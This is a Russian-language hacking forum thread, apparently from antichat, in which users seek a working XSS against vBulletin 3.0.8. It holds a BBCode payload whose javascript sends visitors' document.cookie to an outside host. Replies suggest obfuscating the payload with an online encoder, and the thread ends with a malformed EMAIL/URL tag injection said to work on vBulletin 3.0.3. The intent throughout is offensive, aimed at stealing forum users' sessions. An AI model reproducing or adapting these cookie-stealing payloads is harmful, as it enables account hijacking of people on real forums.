|
Есть ли XSS в vBulletin 3.0.8 ?
Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.
|
Цитата:
http://forum.antichat.ru/thread11807.html |
2 Him@s, неа :( Просто выводит вот такой текст:
[FONT=Arial size=20 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); / ]wj" target="_blank">http://www.]wj А http://www.] стает линком на http://www.]/ и все |
Может в твоем HTML коде нужно что-то заменить или убрать? :confused:
|
так правильно...тока для начала ты его закодируй:
http://www.h4cky0u.org/encrypt/index.php |
Все или часть? И какую кодировку выбирать? Можешь уже сюда кинуть закодированный код?
|
ты его проверял? :(
У меня вот что в сообщение пишет: wj" target="_blank">http://www.][FONT=Arial style=d...41; / ]wj http://www.] - является ссылкой на http://www.]/ :(((((( ЗЫ.. + перед документ.кукис не убрал.. знаю что там он нуже.. и пишет то что я выше написал. |
у меня на локалхосте, я там пробую... могу дать ссылку на дистрибутив
http://vbulletin.net.ru Вот здесь скачай 3.0.8 |
что никто так помочь и не сможет? :(
|
vBulletin 3.0.3:
Код HTML:
[ EMAIL=[ URL= as=`s@wew.ew]mailto:assss@wew.ew ] |
| Время: 07:31 |